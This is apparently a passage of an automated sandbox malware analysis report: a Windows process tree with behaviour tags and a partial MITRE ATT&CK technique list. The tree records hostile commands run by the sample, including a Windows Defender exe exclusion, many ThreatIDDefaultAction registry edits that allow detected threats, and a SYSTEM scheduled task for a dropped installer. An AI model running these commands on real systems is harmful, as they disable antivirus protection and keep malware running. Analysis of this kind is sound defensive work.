                                                                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                                      8⤵
                                                                                                                        PID:4796
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                          9⤵
                                                                                                                            PID:3024
                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                              10⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              PID:2024
                                                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                11⤵
                                                                                                                                  PID:3904
                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            schtasks /CREATE /TN "bqGGCwwWIommTRgeuN" /SC once /ST 04:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS5809.tmp\Install.exe\" 1g /aotdidJVtI 385118 /S" /V1 /F
                                                                                                                            8⤵
                                                                                                                            • Drops file in Windows directory
                                                                                                                            • Creates scheduled task(s)
                                                                                                                            PID:2296
                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bqGGCwwWIommTRgeuN"
                                                                                                                            8⤵
                                                                                                                              PID:4896
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                /C schtasks /run /I /tn bqGGCwwWIommTRgeuN
                                                                                                                                9⤵
                                                                                                                                  PID:632
                                                                                                                                  • \??\c:\windows\SysWOW64\schtasks.exe
                                                                                                                                    schtasks /run /I /tn bqGGCwwWIommTRgeuN
                                                                                                                                    10⤵
                                                                                                                                      PID:1684
                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                                          4⤵
                                                                                                                            PID:2520
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000022001\4.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\1000022001\4.exe"
                                                                                                                          3⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                          PID:2100
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 360
                                                                                                                            4⤵
                                                                                                                            • Program crash
                                                                                                                            PID:1968
                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                      1⤵
                                                                                                                        PID:3932
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3080 -ip 3080
                                                                                                                        1⤵
                                                                                                                          PID:4240
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
                                                                                                                          1⤵
                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                          • Checks BIOS information in registry
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Identifies Wine through registry keys
                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          PID:1752
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 452 -ip 452
                                                                                                                          1⤵
                                                                                                                            PID:3000
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
                                                                                                                            1⤵
                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                            • Checks BIOS information in registry
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Identifies Wine through registry keys
                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:4152
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:1992
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2100 -ip 2100
                                                                                                                            1⤵
                                                                                                                              PID:4788
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4496 -ip 4496
                                                                                                                              1⤵
                                                                                                                                PID:1652
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                1⤵
                                                                                                                                  PID:1704
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                  1⤵
                                                                                                                                    PID:4432
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
                                                                                                                                    1⤵
                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    PID:3820
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe
                                                                                                                                    1⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:1852
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS5809.tmp\Install.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7zS5809.tmp\Install.exe 1g /aotdidJVtI 385118 /S
                                                                                                                                    1⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    PID:2332
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                      2⤵
                                                                                                                                        PID:1892
                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                          3⤵
                                                                                                                                            PID:1596
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                              4⤵
                                                                                                                                                PID:2500
                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                  5⤵
                                                                                                                                                    PID:2324
                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                3⤵
                                                                                                                                                  PID:4612
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                    4⤵
                                                                                                                                                      PID:968
                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                        5⤵
                                                                                                                                                          PID:5100
                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:4536
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                          4⤵
                                                                                                                                                            PID:60
                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                              5⤵
                                                                                                                                                                PID:3800
                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                            forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                            3⤵
                                                                                                                                                              PID:4832
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:4588
                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:1560
                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:2072
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:3384
                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:4336
                                                                                                                                                                          • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:4620
                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      PID:3408
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:4504
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:4496
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:316
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:4116
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:4964
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:3728
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:3648
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:1384
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:4840
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:4072
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:4740
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:3840
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:2152
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:540
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:408
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:940
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:2928
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:3388
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:4388
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:4788
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:544
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:4832
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:4856
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:1668
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:4552
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:2544
                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:1756

                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                                                                        Execution

                                                                                                                                                                                                                        Command and Scripting Interpreter

                                                                                                                                                                                                                        2
                                                                                                                                                                                                                        T1059

                                                                                                                                                                                                                        PowerShell

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1059.001

                                                                                                                                                                                                                        Scheduled Task/Job

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                                        Create or Modify System Process

                                                                                                                                                                                                                        2
                                                                                                                                                                                                                        T1543

                                                                                                                                                                                                                        Windows Service

                                                                                                                                                                                                                        2
                                                                                                                                                                                                                        T1543.003

                                                                                                                                                                                                                        Account Manipulation

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1098

                                                                                                                                                                                                                        Pre-OS Boot

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1542

                                                                                                                                                                                                                        Bootkit

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1542.003

                                                                                                                                                                                                                        Scheduled Task/Job

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                        Privilege Escalation

                                                                                                                                                                                                                        Create or Modify System Process

                                                                                                                                                                                                                        2
                                                                                                                                                                                                                        T1543

                                                                                                                                                                                                                        Windows Service

                                                                                                                                                                                                                        2
                                                                                                                                                                                                                        T1543.003

                                                                                                                                                                                                                        Abuse Elevation Control Mechanism

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1548

                                                                                                                                                                                                                        Bypass User Account Control

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1548.002

                                                                                                                                                                                                                        Scheduled Task/Job

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                        Defense Evasion

